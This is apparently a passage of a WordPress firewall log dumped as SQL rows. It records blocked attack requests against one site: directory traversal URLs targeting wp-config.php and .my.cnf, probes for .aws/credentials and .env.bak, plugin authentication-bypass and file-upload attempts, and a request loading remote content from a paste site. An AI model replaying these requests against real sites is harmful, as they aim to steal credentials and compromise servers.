wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb29nbGUtbXAzLWF1ZGlvLXBsYXllci9kaXJlY3RfZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2301,1629499414.362207,1629499414.085800,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb29nbGUtZG9jdW1lbnQtZW1iZWRkZXIvbGlicy9wZGYucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2302,1629499413.562065,1629499413.450200,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGVycnktcGx1Z2luL2FkbWluL2ltcG9ydC1leHBvcnQvZG93bmxvYWQtY29udGVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(2303,1629499412.018872,1629499411.894100,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://housing-today.co.uk/wp-content/force-download.php?file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvZm9yY2UtZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2304,1629499411.353422,1629499411.259300,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin.php?page=multi_metabox_listing&action=edit&id=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpZF0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(2305,1629499410.317040,1629499409.879600,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpZF0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2306,1629499409.545079,1629499409.338600,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-ajax.php?action=kbslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2307,1629499408.922130,1629499408.645600,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t0aHVtYl0=\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2308,1629499407.738410,1629499407.516200,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2309,1629499407.658979,1629499406.825100,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2310,1629499460.148393,1629499459.961100,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://housing-today.co.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(2311,1629560823.457758,1629560823.367700,'\0\0\0\0\0\0\0\0\0\0��%�ƴ',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2312,1629560823.193832,1629560823.091100,'\0\0\0\0\0\0\0\0\0\0��%�ƴ',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2313,1629564438.575756,1629564438.475500,'\0\0\0\0\0\0\0\0\0\0����o',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(2314,1629564445.482747,1629564445.390500,'\0\0\0\0\0\0\0\0\0\0����o',0,403,0,0,0,'https://housing-today.co.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(2315,1629564442.562947,1629564442.481900,'\0\0\0\0\0\0\0\0\0\0����o',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2316,1629564441.436565,1629564441.347600,'\0\0\0\0\0\0\0\0\0\0����o',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(2317,1629564456.697287,1629564456.594000,'\0\0\0\0\0\0\0\0\0\0����o',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2318,1629564456.522868,1629564456.406100,'\0\0\0\0\0\0\0\0\0\0����o',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(2319,0.000000,1629710578.701365,'\0\0\0\0\0\0\0\0\0\0����qH',0,302,0,1,0,'https://housing-today.co.uk/wp-login.php','https://housing-today.co.uk/wp-login.php?redirect_to=https%3A%2F%2Fhousing-today.co.uk%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36','loginOK',NULL,NULL),(2320,1629797361.825244,1629797361.741700,'\0\0\0\0\0\0\0\0\0\0��4���',0,403,0,0,0,'https://www.housing-today.co.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1}'),(2321,1629797360.959450,1629797360.876400,'\0\0\0\0\0\0\0\0\0\0��4���',0,403,0,0,0,'https://www.housing-today.co.uk/config/aws.yml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NvbmZpZy9hd3MueW1s\",\"category\":\"brute-force\",\"ssl\":1}'),(2322,1629797360.040578,1629797359.959300,'\0\0\0\0\0\0\0\0\0\0��4���',0,403,0,0,0,'https://www.housing-today.co.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1}'),(2323,1629797359.236245,1629797359.155200,'\0\0\0\0\0\0\0\0\0\0��4���',0,403,0,0,0,'https://www.housing-today.co.uk/.aws/credentials',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly5hd3MvY3JlZGVudGlhbHM=\",\"category\":\"brute-force\",\"ssl\":1}'),(2324,1629797358.346284,1629797358.264600,'\0\0\0\0\0\0\0\0\0\0��4���',0,403,0,0,0,'https://www.housing-today.co.uk/info.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2luZm8ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(2325,1629797357.475721,1629797357.394500,'\0\0\0\0\0\0\0\0\0\0��4���',0,403,0,0,0,'https://www.housing-today.co.uk/.env.bak',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly5lbnYuYmFr\",\"category\":\"brute-force\",\"ssl\":1}'),(2326,1629797356.708436,1629797356.611600,'\0\0\0\0\0\0\0\0\0\0��4���',0,403,0,0,0,'https://www.housing-today.co.uk/aws.yml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2F3cy55bWw=\",\"category\":\"brute-force\",\"ssl\":1}'),(2327,1629797355.945997,1629797355.859200,'\0\0\0\0\0\0\0\0\0\0��4���',0,403,0,0,0,'https://www.housing-today.co.uk/phpinfo',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BocGluZm8=\",\"category\":\"brute-force\",\"ssl\":1}'),(2328,1629797355.224711,1629797355.141100,'\0\0\0\0\0\0\0\0\0\0��4���',0,403,0,0,0,'https://www.housing-today.co.uk/phpinfo.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BocGluZm8ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(2329,1629797354.241315,1629797354.147800,'\0\0\0\0\0\0\0\0\0\0��4���',0,403,0,0,0,'https://www.housing-today.co.uk/_profiler/phpinfo',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L19wcm9maWxlci9waHBpbmZv\",\"category\":\"brute-force\",\"ssl\":1}'),(2330,0.000000,1629841853.832057,'\0\0\0\0\0\0\0\0\0\0��6D �',0,200,0,0,0,'https://housing-today.co.uk/?_wfsf=detectProxy','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1','scan:detectproxy',NULL,NULL),(2331,1629938885.361152,1629938885.264200,'\0\0\0\0\0\0\0\0\0\0����ǎ',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'python-requests/2.26.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(2332,1629938932.214851,1629938932.133500,'\0\0\0\0\0\0\0\0\0\0����ǎ',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php',NULL,'python-requests/2.26.0','blocked:waf','Tevolution <= 2.3.6 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"89\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9UZXZvbHV0aW9uL3RtcGxjb25uZWN0b3IvbW9uZXRpemUvdGVtcGxhdGljLWN1c3RvbV9maWVsZHMvc2luZ2xlLXVwbG9hZC5waHA=\",\"category\":\"file_upload\",\"ssl\":1}'),(2333,1629938925.356528,1629938925.277600,'\0\0\0\0\0\0\0\0\0\0����ǎ',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'python-requests/2.26.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(2334,1629938988.299314,1629938988.206700,'\0\0\0\0\0\0\0\0\0\0����ǎ',0,403,0,0,0,'https://housing-today.co.uk/?up_auto_log=true',NULL,'python-requests/2.26.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(2335,1629939009.696957,1629939009.605600,'\0\0\0\0\0\0\0\0\0\0����ǎ',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'python-requests/2.26.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2336,1629939008.736903,1629939008.649900,'\0\0\0\0\0\0\0\0\0\0����ǎ',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2F..%2F.my.cnf',NULL,'python-requests/2.26.0','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vLi4vLm15LmNuZg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2337,1629939083.761153,1629939083.662000,'\0\0\0\0\0\0\0\0\0\0����ǎ',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'python-requests/2.26.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2338,1629939080.031981,1629939079.950500,'\0\0\0\0\0\0\0\0\0\0����ǎ',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php',NULL,'python-requests/2.26.0','blocked:waf','Tevolution <= 2.3.6 - Arbitrary File 